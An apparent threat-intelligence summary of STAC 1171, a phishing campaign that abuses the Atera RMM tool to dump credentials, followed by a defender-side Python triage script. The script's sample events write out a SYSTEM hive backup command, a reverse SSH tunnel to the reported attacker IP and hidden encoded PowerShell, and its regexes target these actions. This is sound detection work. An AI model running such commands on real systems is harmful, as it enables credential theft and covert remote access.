Sophos MDR recently uncovered a cyber campaign that uses targeted phishing to lure victims into installing a legitimate remote monitoring and management (RMM) tool, which the attackers then abuse to extract credentials. This operation, tracked by Sophos as STAC 1171, has been linked with moderate confidence to the Iranian threat group known as MuddyWater or TA450.
The initial incident was flagged by Sophos endpoint behavioral rules in November when credential dumping activity was detected, targeting an organization based in Israel. Analysis of the attack revealed indicators and Tactics, Techniques, and Procedures (TTPs) that aligned with findings reported by Proofpoint regarding TA450. The initial point of entry for this attack was a phishing email that prompted the recipient to open a shared document hosted at a suspicious link and download a file named ‘New Program ICC LTD.zip’.
Within the compressed archive file, a legitimate remote monitoring and management (RMM) tool called Atera was found. The installation of Atera utilized a trial account linked to an email that had likely been compromised. Upon the installation of the Atera Agent, threat actors leveraged remote run commands within Atera to execute a PowerShell script (a.ps1), aimed at extracting credentials and generating a backup file of the SYSTEM registry hive. Fortunately, Sophos behavioral rules were able to intercept and block the credential dumping activity.
In addition to credential dumping, post-compromise actions within Atera included various domain enumeration commands, an attempt to establish an SSH tunnel to 51.16.209[.]105, and an obfuscated PowerShell command used to fetch the Level RMM tool from a specific link.
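As an added defender-side example that is not part of the Sophos report, the following Python triage routine runs the chain described above (an Atera-spawned shell, a SYSTEM hive backup, an SSH tunnel to the reported host, and encoded PowerShell) against constructed process-creation events; the Atera agent binary name and the install paths are assumptions to be checked against your own EDR telemetry.

```python
"""Triage process-creation events for the STAC 1171 chain described above: an RMM agent
(Atera) spawning PowerShell, a SYSTEM hive backup, an SSH tunnel, encoded PowerShell."""
import re

RMM_PARENTS = {"ateraagent.exe"}     # assumed Atera agent binary name; verify in your EDR
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
KNOWN_BAD_HOSTS = {"51.16.209.105"}  # tunnel endpoint named in the Sophos report

# (label, regex). The ssh rule is case-sensitive: -L/-R/-D forward ports, -l is a login name.
RULES = [
    ("hive_backup", re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:system|sam|security)\b", re.I)),
    ("encoded_ps", re.compile(r"\s-e(?:ncodedcommand|nc)?\s+[A-Za-z0-9+/=]{40,}", re.I)),
    ("ssh_tunnel", re.compile(r"\bssh(?:\.exe)?\b.*\s-[LRD]\s+\S+")),
]

def exe_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()  # ignore install location

def flag_event(ev):
    """Return the labels one event triggers; [] means nothing matched."""
    labels = []
    if exe_name(ev["parent_image"]) in RMM_PARENTS and exe_name(ev["image"]) in SHELLS:
        labels.append("rmm_spawned_shell")
    labels += [name for name, rx in RULES if rx.search(ev["command_line"])]
    if any(host in ev["command_line"] for host in KNOWN_BAD_HOSTS):
        labels.append("known_bad_host")
    return labels

def triage(events):
    """Map event id -> labels for every event with at least one hit."""
    return {ev["id"]: labels for ev in events if (labels := flag_event(ev))}

# Constructed sample telemetry modelled on the reported post-compromise actions.
AGENT = r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": AGENT, "image": PS,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Temp\a.ps1"},
    {"id": 2, "parent_image": PS, "image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg save HKLM\SYSTEM C:\Temp\system.bak"},
    {"id": 3, "parent_image": AGENT, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "command_line": "ssh.exe -N -R 9001:127.0.0.1:3389 user@51.16.209.105"},
    {"id": 4, "parent_image": AGENT, "image": PS,
     "command_line": "powershell.exe -nop -w hidden -enc " + "QQBB" * 12},
    {"id": 5, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell.exe Get-ChildItem C:\Users"},
]
if __name__ == "__main__":
    for event_id, labels in triage(SAMPLE_EVENTS).items():
        print(event_id, labels)
```

Events 1 to 4 are flagged and the benign explorer-launched PowerShell in event 5 is not; the RMM-parent rule fires on its own, so a hive backup or tunnel launched by any other parent is still caught by its command-line rule.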
Further investigation revealed similar activity among Sophos non-MDR customers in the United States, indicating a widespread threat posed by this campaign. The Sophos X-Ops team will continue to closely monitor these developments and provide updates on any new information pertaining to this particular threat cluster.
The use of legitimate tools and tactics in cyber attacks continues to pose a significant challenge for organizations globally. By blending in with common software and services, threat actors can easily evade detection and amplify the impact of their malicious activities. It is crucial for businesses to remain vigilant, enhance their cybersecurity defenses, and stay informed about emerging threat actors and their modus operandi.
As cyber threats evolve and become more sophisticated, collaboration between security vendors, organizations, and law enforcement agencies is paramount to effectively combating malicious actors and safeguarding sensitive data. By staying ahead of emerging threats and investing in robust cybersecurity measures, businesses can minimize the risk of falling victim to such campaigns and protect their valuable assets from compromise.